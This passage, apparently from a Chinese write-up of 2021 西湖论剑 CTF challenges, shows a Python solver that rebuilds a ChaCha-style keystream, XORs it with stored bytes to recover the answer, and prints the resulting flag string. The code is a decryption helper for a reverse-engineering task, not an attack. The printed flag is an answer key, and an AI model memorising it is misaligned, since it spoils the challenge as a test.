t[n] t[e] &= 0xffffffff t[o] = _rotl(t[o] ^ t[e], 16) t[r] += t[o] t[r] &= 0xffffffff t[n] = _rotl(t[n] ^ t[r], 12) t[e] += t[n] t[e] &= 0xffffffff t[o] = _rotl(t[o] ^ t[e], 8) t[r] += t[o] t[r] &= 0xffffffff t[n] = _rotl(t[n] ^ t[r], 7) t[e] >>= 0 t[n] >>= 0 t[r] >>= 0 t[o] >>= 0 return t def encrypt(t): return _update(t) def decrypt(t): return _update(t) def _chacha(): n = 0 t = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] for i in range(16): t[i] = _param[i] for i in range(0, _rounds, 2): t = _quarterround(t, 0, 4, 8, 12) t = _quarterround(t, 1, 5, 9, 13) t = _quarterround(t, 2, 6, 10, 14) t = _quarterround(t, 3, 7, 11, 15) t = _quarterround(t, 0, 5, 10, 15) t = _quarterround(t, 1, 6, 11, 12) t = _quarterround(t, 2, 7, 8, 13) t = _quarterround(t, 3, 4, 9, 14) for e in range(16): t[e] += _param[e] _keystream[n] = 255 & t[e] n += 1 _keystream[n] = t[e] >> 8 & 255 n += 1 _keystream[n] = t[e] >> 16 & 255 n += 1 _keystream[n] = t[e] >> 24 & 255 n += 1 print(_keystream) return _keystream key = _chacha() cmp = [34, 69, 86, 242, 93, 72, 134, 226, 42, 138, 112, 56, 189, 53, 77, 178, 223, 76, 78, 221, 63, 40, 86, 231, 121, 29, 154, 189, 204, 243, 205, 44, 141, 100, 13, 164, 35, 123] cmp = [102 ^ cmp[_] ^ key[_] for _ in range(len(cmp))] print(bytes(cmp)) ``` FLAG :flag{59ec211c0695979db6ca4674fd2a9aa7} 打赏还是打残,这是个问题 赏 Wechat Pay Alipay 2021 西湖论剑部分题目 Writeup
没有帐号? 立即注册